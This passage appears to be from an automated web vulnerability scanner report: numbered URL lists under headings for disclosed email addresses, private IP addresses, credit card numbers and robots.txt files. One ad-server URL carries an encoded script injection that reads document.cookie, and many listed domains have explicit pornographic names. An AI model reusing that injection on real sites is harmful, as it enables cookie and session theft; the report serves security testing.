22.156. http://www.corning.com/

22.157. http://www.costcentral.com/

22.158. http://www.createdebate.com/

22.159. http://www.credit-time.net/

22.160. http://www.criminal-records.org/

22.161. http://www.critics.com/

22.162. http://www.cumshotsdb.com/

22.163. http://www.cureresearch.com/

22.164. http://www.cyber-seek.com/

22.165. http://www.cyberfinder.com/

22.166. http://www.dabbledb.com/

22.167. http://www.dadamo.com/

22.168. http://www.dailybethea.com/

22.169. http://www.dailycognition.com/

22.170. http://www.dailynylongalleries.com/

22.171. http://www.dandyproject.com/

22.172. http://www.davidmovie.com/

22.173. http://www.davison.com/

22.174. http://www.daycare.com/

22.175. http://www.deanza.edu/

22.176. http://www.dearesq.com/

22.177. http://www.debtgoal.com/

22.178. http://www.deguate.com/

22.179. http://www.deluxnetworks.com/

22.180. http://www.desert-tropicals.com/

22.181. http://www.dex.com/

22.182. http://www.dhlive.com/

22.183. http://www.diethealthclub.com/

22.184. http://www.diplodrivers.com/

22.185. http://www.dispatchinteractive.com/

22.186. http://www.divorcemag.com/

22.187. http://www.dizzydrive.com/

22.188. http://www.doghouseboxing.com/

22.189. http://www.domainshop.com/

22.190. http://www.domainunion.de/

22.191. http://www.donga.com/

22.192. http://www.donnan.com/

22.193. http://www.dotcells.com/

22.194. http://www.dotzup.com/

22.195. http://www.downrange.tv/

22.196. http://www.downy.com/

22.197. http://www.dressupdollgames.net/

22.198. http://www.dsmtuners.com/

22.199. http://www.dude.com/

22.200. http://www.dulcolaxusa.com/

22.201. http://www.dynamictoolbar.com/

22.202. http://www.easyjob.net/

22.203. http://www.ebar.com/

22.204. http://www.ebooknetworking.net/

22.205. http://www.edenbridals.com/

22.206. http://www.edgarsnyder.com/

22.207. http://www.edison.com/

22.208. http://www.eeeuser.com/

22.209. http://www.efashioncentral.com/

22.210. http://www.eforo.com/

22.211. http://www.electrical-online.com/

22.212. http://www.electronickits.com/

22.213. http://www.electronicsinfoline.com/

22.214. http://www.elmresources.com/

22.215. http://www.elook.org/

22.216. http://www.emporia.edu/

22.217. http://www.endlesspools.com/

22.218. http://www.endoftheamericandream.com/

22.219. http://www.engineerjobs.com/

22.220. http://www.entertainment-savings-offers.com/

22.221. http://www.epdfsearch.com/

22.222. http://www.erelopro.com/

22.223. http://www.eslbee.com/

22.224. http://www.eslteachersboard.com/

22.225. http://www.everestcollege.edu/

22.226. http://www.expedient.com/

22.227. http://www.exploringthenorth.com/

22.228. http://www.extranet-post.com/

22.229. http://www.extremecashrobot.com/

22.230. http://www.extremecow.com/

22.231. http://www.extremefunnyhumor.com/

22.232. http://www.extremeoverclocking.com/

22.233. http://www.ez.ro/

22.234. http://www.factsfacts.com/

22.235. http://www.fadfusion.com/

22.236. http://www.familycorner.com/

22.237. http://www.farturl.com/

22.238. http://www.fastfreevideos.com/

22.239. http://www.fastpartner.net/

22.240. http://www.fbschedules.com/

22.241. http://www.fed-pack.com/

22.242. http://www.feetpics.net/

22.243. http://www.fileforums.com/

22.244. http://www.filmjabber.com/

22.245. http://www.filters-now.com/

22.246. http://www.findstudentloans.com/

22.247. http://www.firstweber.com/

22.248. http://www.fixcomputerblog.com/

22.249. http://www.flashanywhere.net/

22.250. http://www.florida.com/

22.251. http://www.fluke.com/

22.252. http://www.flvsoft.com/

22.253. http://www.fmaware.org/

22.254. http://www.forconstructionpros.com/

22.255. http://www.foreclosed-government-homes.com/

22.256. http://www.forministry.com/

22.257. http://www.formsguru.com/

22.258. http://www.fortunecity.co.uk/

22.259. http://www.foxyhousewives.com/

22.260. http://www.fr.st/

22.261. http://www.france3.fr/

22.262. http://www.free-graphics.com/

22.263. http://www.free-music-downloads.ws/

22.264. http://www.freeapphosting.com/

22.265. http://www.freecenter.com/

22.266. http://www.freecheckings.com/

22.267. http://www.freefever.com/

22.268. http://www.freemomsvideo.com/

22.269. http://www.freevistafiles.com/

22.270. http://www.freexpreviews.com/

22.271. http://www.freshwebmaster.com/

22.272. http://www.friendship-poems.com/

22.273. http://www.friestube.com/

22.274. http://www.fromoldbooks.org/

22.275. http://www.fullsizebronco.com/

22.276. http://www.funcel.mobi/

22.277. http://www.funcityfinder.com/

22.278. http://www.fundmojo.com/

22.279. http://www.furninfo.com/

22.280. http://www.fxsound.com/

22.281. http://www.gameguidedog.com/

22.282. http://www.gamingnewslink.com/

22.283. http://www.gardens.com/

22.284. http://www.getmarci.com/

22.285. http://www.getmyhomesvalue.com/

22.286. http://www.getzips.com/

22.287. http://www.gigamoves.com/

22.288. http://www.girlsontherun.org/

22.289. http://www.glowfoto.com/

22.290. http://www.gocurrency.com/

22.291. http://www.godempire.org/

22.292. http://www.goldcycler.com/

22.293. http://www.googleimages.com/

22.294. http://www.gospelmusic.org.uk/

22.295. http://www.governmentregistry.org/

22.296. http://www.govpaynow.com/

22.297. http://www.grandcanyon.com/

22.298. http://www.grandpaandteen.com/

22.299. http://www.grannyhound.com/

22.300. http://www.grannyroom.com/

22.301. http://www.grillpro.com/

22.302. http://www.gruntsmilitary.com/

22.303. http://www.gtplanet.net/

22.304. http://www.guide4home.com/

22.305. http://www.guideseek.com/

22.306. http://www.guitarscanada.com/

22.307. http://www.guweb.com/

22.308. http://www.h2onews.org/

22.309. http://www.haircuttery.com/

22.310. http://www.hairycabin.com/

22.311. http://www.handgunforum.net/

22.312. http://www.hatchetgear.com/

22.313. http://www.hd-blow.com/

22.314. http://www.hd.org/

22.315. http://www.hd4sale.com/

22.316. http://www.healthx.com/

22.317. http://www.hiltonhawaiianvillage.com/

22.318. http://www.hintergrund.de/

22.319. http://www.hireteen.com/

22.320. http://www.hiusa.org/

22.321. http://www.homebasedofficework.com/

22.322. http://www.homedistiller.org/

22.323. http://www.homeinsurance.com/

22.324. http://www.homepage-baukasten.de/

22.325. http://www.hopkins-arthritis.org/

22.326. http://www.hot-mature-diary.com/

22.327. http://www.hot-mom.org/

22.328. http://www.hotcelebrity.name/

22.329. http://www.hotsweeps4u.com/

22.330. http://www.hottlady.com/

22.331. http://www.hqhomeclips.com/

22.332. http://www.hrbskillslearningcenter.com/

22.333. http://www.htmate2.com/

22.334. http://www.i.ph/

22.335. http://www.ibmsaudio.com/

22.336. http://www.idilis.ro/

22.337. http://www.ihousenet.com/

22.338. http://www.imageenvision.com/

22.339. http://www.imagetwist.com/

22.340. http://www.indthegap.com/

22.341. http://www.inform.com/

22.342. http://www.innvista.com/

22.343. http://www.instant-cash-source.com/

22.344. http://www.integratelecom.com/

22.345. http://www.inthe90s.com/

22.346. http://www.intimasian.com/

22.347. http://www.investorsdailyedge.net/

22.348. http://www.ionchannels.org/

22.349. http://www.ipodarcade.com/

22.350. http://www.irfanview.net/

22.351. http://www.isagoodies.com/

22.352. http://www.itmonline.org/

22.353. http://www.jamaica-star.com/

22.354. http://www.jameshardie.com/

22.355. http://www.jawdroppingasses.com/

22.356. http://www.jaxed.com/

22.357. http://www.jayd-lovely.net/

22.358. http://www.jeffcopublicschools.org/

22.359. http://www.jinni.com/

22.360. http://www.jjgames.com/

22.361. http://www.jkharris.com/

22.362. http://www.justrightcreations.net/

22.363. http://www.k1speed.com/

22.364. http://www.kalpoint.com/

22.365. http://www.kampsight.com/

22.366. http://www.katsmovies.com/

22.367. http://www.kbhgames.com/

22.368. http://www.kensington.com/

22.369. http://www.kerbeck.com/

22.370. http://www.kerpoof.com/

22.371. http://www.khsaa.org/

22.372. http://www.kibagames.com/

22.373. http://www.kicker.com/

22.374. http://www.kidsthemebedrooms.com/

22.375. http://www.kikkomanusa.com/

22.376. http://www.kissladyboy.com/

22.377. http://www.klicer.com/

22.378. http://www.knife-depot.com/

22.379. http://www.knitlist.com/

22.380. http://www.kstatecollegian.com/

22.381. http://www.kungfumagazine.com/

22.382. http://www.kzzp.com/

22.383. http://www.lacoste.com/

22.384. http://www.lake-county-fair.com/

22.385. http://www.lakecompounce.com/

22.386. http://www.lakeplace.com/

22.387. http://www.laobserved.com/

22.388. http://www.laptopical.com/

22.389. http://www.lasalle.edu/

22.390. http://www.latinspicebabes.com/

22.391. http://www.lattc.edu/

22.392. http://www.laurellkhamilton.org/

22.393. http://www.leadsonline.eu/

22.394. http://www.legendamateurs.com/

22.395. http://www.lespac.com/

22.396. http://www.levolor.com/

22.397. http://www.libraryspot.com/

22.398. http://www.like-em-straight.com/

22.399. http://www.likeulo.us/

22.400. http://www.lilydouce.com/

22.401. http://www.littlebigplanet.com/

22.402. http://www.livesoccertv.com/

22.403. http://www.livingontheedge.org/

22.404. http://www.llli.org/

22.405. http://www.lmsal.com/

22.406. http://www.lmtribune.com/

22.407. http://www.localjobs101.com/

22.408. http://www.logler.com/

22.409. http://www.longhaircommunity.com/

22.410. http://www.lookoutlanding.com/

22.411. http://www.luminous-landscape.com/

22.412. http://www.makefive.com/

22.413. http://www.manchester2002-uk.com/

22.414. http://www.mangahead.com/

22.415. http://www.manhattanapts.com/

22.416. http://www.maniactools.com/

22.417. http://www.manycam.com/

22.418. http://www.mature-better.com/

22.419. http://www.maxadds.com/

22.420. http://www.maxdome.de/

22.421. http://www.mayohealthsystem.org/

22.422. http://www.mayura.com/

22.423. http://www.mazda6club.com/

22.424. http://www.mbn.com.ua/

22.425. http://www.mbon.org/

22.426. http://www.mbrgames.com/

22.427. http://www.mcc.edu/

22.428. http://www.medicaiddentistry.com/

22.429. http://www.mgexperience.net/

22.430. http://www.michaelschenkerhimself.com/

22.431. http://www.michie.com/

22.432. http://www.midlandstech.edu/

22.433. http://www.minglehouse.com/

22.434. http://www.mini001.com/

22.435. http://www.mirandalambert.com/

22.436. http://www.mobilerider.com/

22.437. http://www.momsgiveass.com/

22.438. http://www.monica.com/

22.439. http://www.montanalottery.com/

22.440. http://www.monticello.org/

22.441. http://www.motorbicycling.com/

22.442. http://www.mp3hustle.com/

22.443. http://www.mrclean.com/

22.444. http://www.mtsac.edu/

22.445. http://www.muralsforkids.com/

22.446. http://www.muskingum.edu/

22.447. http://www.mydivadoll.com/

22.448. http://www.myefficientplanet.com/

22.449. http://www.myfreedegree.com/

22.450. http://www.myglobalsearch.com/

22.451. http://www.mynetworktv.com/

22.452. http://www.mytones.us/

22.453. http://www.myweddingvows.com/

22.454. http://www.nahanniriverherbs.com/

22.455. http://www.naturalhealers.com/

22.456. http://www.nbc.ca/

22.457. http://www.neric.org/

22.458. http://www.net-mine.com/

22.459. http://www.newamateurtube.com/

22.460. http://www.newverhost.com/

22.461. http://www.nextstat.com/

22.462. http://www.nightmarefactory.com/

22.463. http://www.nikonians.org/

22.464. http://www.nin.com/

22.465. http://www.noah-health.org/

22.466. http://www.northerntrust.com/

22.467. http://www.nrlc.org/

22.468. http://www.nsaahome.org/

22.469. http://www.nsk-sys.com/

22.470. http://www.nudism.ws/

22.471. http://www.nuffnang.com.au/

22.472. http://www.nutone.com/

22.473. http://www.oaktreevintage.com/

22.474. http://www.oceana.org/

22.475. http://www.okhistory.org/

22.476. http://www.old-yearbooks.com/

22.477. http://www.oldchevytruck.com/

22.478. http://www.olthmqe.com/

22.479. http://www.onesourcetalent.com/

22.480. http://www.onlineatlas.us/

22.481. http://www.onlinebankchecking.com/

22.482. http://www.onlinecustomersurvey.com/

22.483. http://www.onlineradiostations.com/

22.484. http://www.ontargetpayday.com/

22.485. http://www.orlandoairports.net/

22.486. http://www.oxaes.com/

22.487. http://www.pageranktop.com/

22.488. http://www.paintballforum.com/

22.489. http://www.pasadena.edu/

22.490. http://www.pay-dayin60seconds.net/

22.491. http://www.paydayin-60seconds.com/

22.492. http://www.pecentral.org/

22.493. http://www.penisadvantage.com/

22.494. http://www.pepperfool.com/

22.495. http://www.perfectgirlsclub.com/

22.496. http://www.pervyernies.com/

22.497. http://www.philstart.com/

22.498. http://www.phobialist.com/

22.499. http://www.photos-naturistes.fr/

22.500. http://www.pianostreet.com/

22.501. http://www.picturesofengland.com/

22.502. http://www.piworld.com/

22.503. http://www.pixela.co.jp/

22.504. http://www.plan3d.com/

22.505. http://www.playingforchange.com/

22.506. http://www.poetv.com/

22.507. http://www.poker.com/

22.508. http://www.pollhost.com/

22.509. http://www.powerboatlistings.com/

22.510. http://www.prensaescrita.com/

22.511. http://www.prettynylonfeet.com/

22.512. http://www.primeretailmail.com/

22.513. http://www.printsmadeeasy.com/

22.514. http://www.promarkresearch.com/

22.515. http://www.prototype-ui.com/

22.516. http://www.prudentialhomesale.com/

22.517. http://www.publicbookshelf.com/

22.518. http://www.purehockey.com/

22.519. http://www.qkype.com/

22.520. http://www.quizasaurus.com/

22.521. http://www.quizulous.com/

22.522. http://www.rapescenes.net/

22.523. http://www.rateitsearch.com/

22.524. http://www.rats2u.com/

22.525. http://www.rauantiques.com/

22.526. http://www.raylamontagne.com/

22.527. http://www.rb-hosting.de/

22.528. http://www.readymobile.com/

22.529. http://www.realemoexposed.com/

22.530. http://www.realestate-mls.com/

22.531. http://www.realfreevids.com/

22.532. http://www.reallycute.net/

22.533. http://www.realwebaudio.com/

22.534. http://www.recetasgratis.net/

22.535. http://www.redhairedteens.com/

22.536. http://www.refundsweepers.com/

22.537. http://www.relylocal.com/

22.538. http://www.rentawreck.com/

22.539. http://www.reversehelpline.us/

22.540. http://www.revues.org/

22.541. http://www.ricedelman.com/

22.542. http://www.rickystokesnews.com/

22.543. http://www.ridemysecretary.com/

22.544. http://www.rigolus.com/

22.545. http://www.ringtonefav.net/

22.546. http://www.riverfacts.com/

22.547. http://www.rogerssportinggoods.com/

22.548. http://www.romanticasheville.com/

22.549. http://www.ronstire.com/

22.550. http://www.rp-online.de/

22.551. http://www.rr-bb.com/

22.552. http://www.runningroom.com/

22.553. http://www.rvntracker.com/

22.554. http://www.rvsurplus.net/

22.555. http://www.s3xads.com/

22.556. http://www.sa-venues.com/

22.557. http://www.salespider.com/

22.558. http://www.samsontech.com/

22.559. http://www.sanfranrecruiter.com/

22.560. http://www.save2pc.com/

22.561. http://www.scenes-of-seduction.com/

22.562. http://www.schoolexpress.com/

22.563. http://www.scrapbookingtop50.com.au/

22.564. http://www.scrapjazz.com/

22.565. http://www.searchlab.info/

22.566. http://www.seat42f.com/

22.567. http://www.sevensidedcube.net/

22.568. http://www.seventhsanctum.com/

22.569. http://www.shareavenue.com/

22.570. http://www.sharpened.net/

22.571. http://www.shazo.com/

22.572. http://www.shopgala.com/

22.573. http://www.shopovertime.com/

22.574. http://www.shopthepig.com/

22.575. http://www.simpleanddelicious.com/

22.576. http://www.skillsurvey.com/

22.577. http://www.slicklegs.com/

22.578. http://www.slotsjam.com/

22.579. http://www.smarthomeusa.com/

22.580. http://www.smccme.edu/

22.581. http://www.socialsecurityhop.com/

22.582. http://www.soflens.com/

22.583. http://www.solar-aid.org/

22.584. http://www.sololadyboys.com/

22.585. http://www.soundsearch.com/

22.586. http://www.southpointcasino.com/

22.587. http://www.spaceflightnow.com/

22.588. http://www.spankwireinhd.com/

22.589. http://www.spearboard.com/

22.590. http://www.speedingupmypc.com/

22.591. http://www.speedysigns.com/

22.592. http://www.sportbikes.net/

22.593. http://www.squirt-disgrace.net/

22.594. http://www.startec.com/

22.595. http://www.sterndrive.info/

22.596. http://www.stocking-cuties.com/

22.597. http://www.stockingsjerk.com/

22.598. http://www.straight.com/

22.599. http://www.stroudsrestaurant.com/

22.600. http://www.stservicemovie.com/

22.601. http://www.suelebeau.com/

22.602. http://www.sunday-school-fun-zone.com/

22.603. http://www.supermotors.net/

22.604. http://www.suppview.com/

22.605. http://www.surnamesite.com/

22.606. http://www.survey.com/

22.607. http://www.surveyqlik.com/

22.608. http://www.survivaltopics.com/

22.609. http://www.sweetness-light.com/

22.610. http://www.sxtracking.com/

22.611. http://www.sybian.com/

22.612. http://www.sztaki.hu/

22.613. http://www.tapartoche.com/

22.614. http://www.targetx.com/

22.615. http://www.tattooingmovies.com/

22.616. http://www.taylortrue.com/

22.617. http://www.tcoasttalk.com/

22.618. http://www.tcsoal.org/

22.619. http://www.techgage.com/

22.620. http://www.teenburggirls.com/

22.621. http://www.teenloveholes.com/

22.622. http://www.teensnu.com/

22.623. http://www.tempcredit.com/

22.624. http://www.teriskitchen.com/

22.625. http://www.texasbowhunter.com/

22.626. http://www.thaiteenager.com/

22.627. http://www.thecitizen.com/

22.628. http://www.theclassof1979.org/

22.629. http://www.thefashionpolice.net/

22.630. http://www.thefedoralounge.com/

22.631. http://www.thefwa.com/

22.632. http://www.thelaughtermovie.com/

22.633. http://www.themag12.com/

22.634. http://www.themanschoice.com/

22.635. http://www.themaxtube.com/

22.636. http://www.theminiaturespage.com/

22.637. http://www.thepotteries.org/

22.638. http://www.therumpus.net/

22.639. http://www.thetelegram.com/

22.640. http://www.thewitcher.com/

22.641. http://www.thorgaming.com/

22.642. http://www.ticalc.org/

22.643. http://www.ticketstub.com/

22.644. http://www.tight18yos.com/

22.645. http://www.tinythongpanties.com/

22.646. http://www.tireteam.com/

22.647. http://www.tldm.org/

22.648. http://www.top20cool.com/

22.649. http://www.totalassault.com/

22.650. http://www.toxel.com/

22.651. http://www.trade2win.com/

22.652. http://www.traffic-find.com/

22.653. http://www.travelagentcentral.com/

22.654. http://www.travour.com/

22.655. http://www.triumphrat.net/

22.656. http://www.trustedhomeservices.com/

22.657. http://www.tubedaddy.net/

22.658. http://www.tubefish.org/

22.659. http://www.tubeguide.info/

22.660. http://www.tucsonweekly.com/

22.661. http://www.tunecore.com/

22.662. http://www.turnbacktogod.com/

22.663. http://www.twodicksinhisass.com/

22.664. http://www.ultimate-penis-enlargement-guide.com/

22.665. http://www.umassonline.net/

22.666. http://www.umc.edu/

22.667. http://www.uniquerewards.com/

22.668. http://www.unitedfcu.com/

22.669. http://www.unsub-me.com/

22.670. http://www.uprinting.com/

22.671. http://www.upskirtphotos.org/

22.672. http://www.urbanministry.org/

22.673. http://www.urnotalone.com/

22.674. http://www.usa-gymnastics.org/

22.675. http://www.usacitiesonline.com/

22.676. http://www.usafootball.com/

22.677. http://www.usagardener.com/

22.678. http://www.usapaydayassistance.net/

22.679. http://www.uscashwire.com/

22.680. http://www.uschess.org/

22.681. http://www.usedforsale.biz/

22.682. http://www.userfriendly.org/

22.683. http://www.usgo.org/

22.684. http://www.usherbrooke.ca/

22.685. http://www.utopiandirect.com/

22.686. http://www.vacationrentalsad.com/

22.687. http://www.vanguardmil.com/

22.688. http://www.vectormarketing.com/

22.689. http://www.veoliaes-sw.com/

22.690. http://www.verawang.com/

22.691. http://www.vertadnet.com/

22.692. http://www.videora.com/

22.693. http://www.visitmaine.net/

22.694. http://www.vitrue.com/

22.695. http://www.vividfeeds.com/

22.696. http://www.vividracing.com/

22.697. http://www.vladtod.com/

22.698. http://www.wafbhomes.com/

22.699. http://www.wagnerspraytech.com/

22.700. http://www.watchforeclosure.com/

22.701. http://www.web-source.net/

22.702. http://www.webcampromotions.com/

22.703. http://www.webdesign.org/

22.704. http://www.weebls-stuff.com/

22.705. http://www.wellnessletter.com/

22.706. http://www.welt-atlas.de/

22.707. http://www.werdyo.com/

22.708. http://www.westendmotorsports.com/

22.709. http://www.westport-news.com/

22.710. http://www.wetmaturevids.com/

22.711. http://www.whatsonxiamen.com/

22.712. http://www.wheelessonline.com/

22.713. http://www.wholesaledir.com/

22.714. http://www.wikifeet.com/

22.715. http://www.wildwoodsnj.com/

22.716. http://www.windows-fast.com/

22.717. http://www.windows-new.com/

22.718. http://www.winnipesaukee.com/

22.719. http://www.wmost.com/

22.720. http://www.womeninthebible.net/

22.721. http://www.womensenews.org/

22.722. http://www.wonderbackgrounds.com/

22.723. http://www.woodcraftplans.com/

22.724. http://www.wordplays.com/

22.725. http://www.workfromhomenews6.com/

22.726. http://www.worksourceoregon.org/

22.727. http://www.wri.org/

22.728. http://www.wwwamericanclassifieds.com/

22.729. http://www.x-y.net/

22.730. http://www.xaapa.com/

22.731. http://www.xlasians.com/

22.732. http://www.xoticpc.com/

22.733. http://www.xr77.com/

22.734. http://www.yankeefoliage.com/

22.735. http://www.ymlp163.com/

22.736. http://www.ymlp188.com/

22.737. http://www.yourinsights.net/

22.738. http://www.youthfire.com/

22.739. http://www.zapak.com/

23. Email addresses disclosed

23.1. http://ads.adbrite.com/adserver/vdi/742697

23.2. http://ads1.msn.com/library/dap.js

23.3. http://www.amateurclipz.com/favicon.ico

23.4. http://www.atomiclearning.com/favicon.ico

23.5. http://www.bobmovs.com/favicon.ico

23.6. http://www.boymale.net/favicon.ico

23.7. http://www.brighthorizons.com/favicon.ico

23.8. http://www.bucknell.edu/favicon.ico

23.9. http://www.cartoonterritory.com/favicon.ico

23.10. http://www.chemicalelements.com/favicon.ico

23.11. http://www.coinmerc.com/favicon.ico

23.12. http://www.crystal-co.com/favicon.ico

23.13. http://www.deguate.com/favicon.ico

23.14. http://www.diplo.de/favicon.ico

23.15. http://www.divorcemag.com/favicon.ico

23.16. http://www.donbest.com/favicon.ico

23.17. http://www.duplinschools.net/favicon.ico

23.18. http://www.fateback.com/favicon.ico

23.19. http://www.fb2share.com/favicon.ico

23.20. http://www.feetpics.net/favicon.ico

23.21. http://www.freehairypusssy.com/favicon.ico

23.22. http://www.freemomsvideo.com/favicon.ico

23.23. http://www.getfreedental.com/favicon.ico

23.24. http://www.ghettodoorway.com/favicon.ico

23.25. http://www.greatnow.com/favicon.ico

23.26. http://www.gwinnettcounty.com/favicon.ico

23.27. http://www.hairyholess.com/favicon.ico

23.28. http://www.hasoid-asian.com/favicon.ico

23.29. http://www.herehard.tv/favicon.ico

23.30. http://www.heresquirt.tv/favicon.ico

23.31. http://www.humiliation-of-slave.com/favicon.ico

23.32. http://www.hziegler.com/favicon.ico

23.33. http://www.innogames.de/favicon.ico

23.34. http://www.interstatemusic.com/favicon.ico

23.35. http://www.ipodarcade.com/favicon.ico

23.36. http://www.ius.edu/favicon.ico

23.37. http://www.legendamateurs.com/favicon.ico

23.38. http://www.mature-better.com/favicon.ico

23.39. http://www.maysville-online.com/content/tncms/live/global/resources/scripts/common.js

23.40. http://www.maysville-online.com/content/tncms/live/global/resources/scripts/facebox.js

23.41. http://www.maysville-online.com/content/tncms/live/global/resources/styles/skin.css

23.42. http://www.metroguide.com/favicon.ico

23.43. http://www.metroparks.org/favicon.ico

23.44. http://www.mkt3228.com/favicon.ico

23.45. http://www.mnnews.com/favicon.ico

23.46. http://www.monsterjam.com/favicon.ico

23.47. http://www.moultrieobserver.com/favicon.ico

23.48. http://www.mylovedanal.tv/favicon.ico

23.49. http://www.mylovedasses.tv/favicon.ico

23.50. http://www.mylovedrubber.com/favicon.ico

23.51. http://www.nationnews.com/favicon.ico

23.52. http://www.ntra.com/favicon.ico

23.53. http://www.okhistory.org/favicon.ico

23.54. http://www.paparazzibeach.net/favicon.ico

23.55. http://www.princesshouse.com/favicon.ico

23.56. http://www.qianlong.com/favicon.ico

23.57. http://www.rapescenes.net/favicon.ico

23.58. http://www.rb-hosting.de/favicon.ico

23.59. http://www.rv-clubs.us/favicon.ico

23.60. http://www.save2pc.com/favicon.ico

23.61. http://www.secretaryinstocking.com/favicon.ico

23.62. http://www.socializr.com/favicon.ico

23.63. http://www.sololadyboys.com/favicon.ico

23.64. http://www.stopsacidreflux.com/favicon.ico

23.65. http://www.tcoasttalk.com/favicon.ico

23.66. http://www.teriskitchen.com/favicon.ico

23.67. http://www.tireteam.com/favicon.ico

23.68. http://www.torontolife.com/favicon.ico

23.69. http://www.twoofus.org/favicon.ico

23.70. http://www.upskirtphotos.org/favicon.ico

23.71. http://www.vermontjoblink.com/favicon.ico

23.72. http://www.vintagefield.com/favicon.ico

23.73. http://www.wellspan.org/favicon.ico

23.74. http://www.wetmaturevids.com/favicon.ico

23.75. http://www.wordplays.com/favicon.ico

23.76. http://www.wylienews.com/favicon.ico

23.77. http://www.yardbarker.com/javascripts/all.js

24. Private IP addresses disclosed

24.1. http://connect.facebook.net/en_US/all.js

24.2. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vSJ96PL2YpP.css

24.3. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/UpS8_ZmY8j-.js

24.4. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png

24.5. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/WU1xUSaLgfA.css

24.6. http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/kSPKJpX3bda.js

24.7. http://www.610wtvn.com/favicon.ico

24.8. http://www.6url.com/favicon.ico

24.9. http://www.ajdesigner.com/favicon.ico

24.10. http://www.algaecal.com/favicon.ico

24.11. http://www.aliciasrecipes.com/favicon.ico

24.12. http://www.am570radio.com/favicon.ico

24.13. http://www.babygenderprediction.com/favicon.ico

24.14. http://www.beautifulcervix.com/favicon.ico

24.15. http://www.bookreporter.com/favicon.ico

24.16. http://www.bordersheriffs.com/favicon.ico

24.17. http://www.danielsilvabooks.com/favicon.ico

24.18. http://www.dickeys.com/favicon.ico

24.19. http://www.einsurancemarket.com/favicon.ico

24.20. http://www.facebook.com/extern/login_status.php

24.21. http://www.facebook.com/extern/login_status.php

24.22. http://www.facebook.com/plugins/recommendations.php

24.23. http://www.facebook.com/plugins/recommendations.php

24.24. http://www.festfoods.com/favicon.ico

24.25. http://www.getgrantinfo.net/favicon.ico

24.26. http://www.greatnow.com/favicon.ico

24.27. http://www.gtlakes.com/favicon.ico

24.28. http://www.jcpamericanlivingtour.com/favicon.ico

24.29. http://www.justgiving.com/favicon.ico

24.30. http://www.lacounty.info/favicon.ico

24.31. http://www.letusreason.org/favicon.ico

24.32. http://www.medcitynews.com/favicon.ico

24.33. http://www.menstuff.org/favicon.ico

24.34. http://www.nextgenwalkthroughs.com/favicon.ico

24.35. http://www.nextmark.com/favicon.ico

24.36. http://www.ocfl.net/favicon.ico

24.37. http://www.sew4home.com/favicon.ico

24.38. http://www.sugardoodle.info/favicon.ico

24.39. http://www.themat.com/favicon.ico

24.40. http://www.visitsouth.com/favicon.ico

24.41. http://www.wdasfm.com/favicon.ico

25. Credit card numbers disclosed

26. Robots.txt file

26.1. http://a.tribalfusion.com/displayAd.js

26.2. http://ad.doubleclick.net/ad/tnews.lee.net/

26.3. http://ad.turn.com/server/pixel.htm

26.4. http://ads.pointroll.com/PortalServe/

26.5. http://ads.specificmedia.com/serve/v=5

26.6. http://as.casalemedia.com/j

26.7. http://b.scorecardresearch.com/b

26.8. http://b.voicefive.com/b2

26.9. http://c.betrad.com/surly.js

26.10. http://cache.specificmedia.com/creative/blank.gif

26.11. http://cdn.optmd.com/blank.html

26.12. http://cdn.turn.com/server/ddc.htm

26.13. http://cm.g.doubleclick.net/pixel

26.14. http://cms.quantserve.com/dpixel

26.15. http://crl.geotrust.com/crls/secureca.crl

26.16. http://d.xp1.ru4.com/activity

26.17. http://d13.zedo.com/OzoDB/cutils/R53_5/jsc/1190/zpu.html

26.18. http://d3.zedo.com/jsc/d3/ff2.html

26.19. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js

26.20. http://feeds.bbci.co.uk/news/rss.xml

26.21. http://idpix.media6degrees.com/orbserv/hbpix

26.22. http://img0.yardbarker.com/media/f/8/f832476d611c0dd18e2d227a2c52ddeb172fe41a/footer_story/charlie-batch.jpg

26.23. http://img1.yardbarker.com/media/e/a/ea5193d9ec768455228a325516c165fd5e1f9b08/footer_story/Kansas_City_Chiefs_aab2.jpg

26.24. http://img2.yardbarker.com/media/4/0/405e6a02aee3eecae135f27fbf734dcc55320c07/medium/Philadelphia_Eagles_v_d8c9.jpg

26.25. http://img3.yardbarker.com/media/f/0/f000fbdc84ba51062eb26c6ba07cf0c827a59f4a/footer_story/Baltimore_Ravens_v_79ff.jpg

26.26. http://jkleman.townnews.com/media4/mcfarland/service/right_small.swf

26.27. http://leeenterprises.112.2o7.net/b/ss/lee-maysville-onlinecom/1/H.21/s25350702094673

26.28. http://m1.zedo.com/log/p.gif

26.29. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

26.30. http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif

26.31. http://r.turn.com/r/bd

26.32. http://r1-ads.ace.advertising.com/site=776813/size=300250/u=2/bnum=33334840/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.maysville-online.com%252Ffavicon.ico%253Fbe4e4%252522-alert%2528document.cookie%2529-%252522ccebc516c28%253D1

26.33. http://spe.atdmt.com/ds/DECHOJANSLEE/Lee_Misses_Shopphobia_9_7_10/lee_shopphobic_men_300x250_35k_v3a.jpg

26.34. http://speed.pointroll.com/PointRoll/Media/Banners/USCellular/865245/USC_familyplan_eric_300x250.gif

26.35. http://sync.mathtag.com/sync/img

26.36. http://tag.admeld.com/pixel

26.37. http://tag.contextweb.com/TagPublish/getjs.aspx

26.38. http://turn.nexac.com/r/pu

26.39. http://us.bc.yahoo.com/b

26.40. http://www.1-800-volunteer.org/favicon.ico

26.41. http://www.123-reg.co.uk/favicon.ico

26.42. http://www.1280.com/favicon.ico

26.43. http://www.181.fm/favicon.ico

26.44. http://www.1920s-fashion-and-music.com/favicon.ico

26.45. http://www.2-clicks-stamps.com/favicon.ico

26.46. http://www.20minutos.es/favicon.ico

26.47. http://www.2u.ru/favicon.ico

26.48. http://www.321gold.com/favicon.ico

26.49. http://www.3btech.net/favicon.ico

26.50. http://www.3reef.com/favicon.ico

26.51. http://www.3stepads.com/favicon.ico

26.52. http://www.411.info/favicon.ico

26.53. http://www.4miche.com/favicon.ico

26.54. http://www.4strokes.com/favicon.ico

26.55. http://www.610wtvn.com/favicon.ico

26.56. http://www.6url.com/favicon.ico

26.57. http://www.971zht.com/favicon.ico

26.58. http://www.aaaoklahoma.com/favicon.ico

26.59. http://www.aaaorid.com/favicon.ico

26.60. http://www.aaaxvdo.tk/favicon.ico

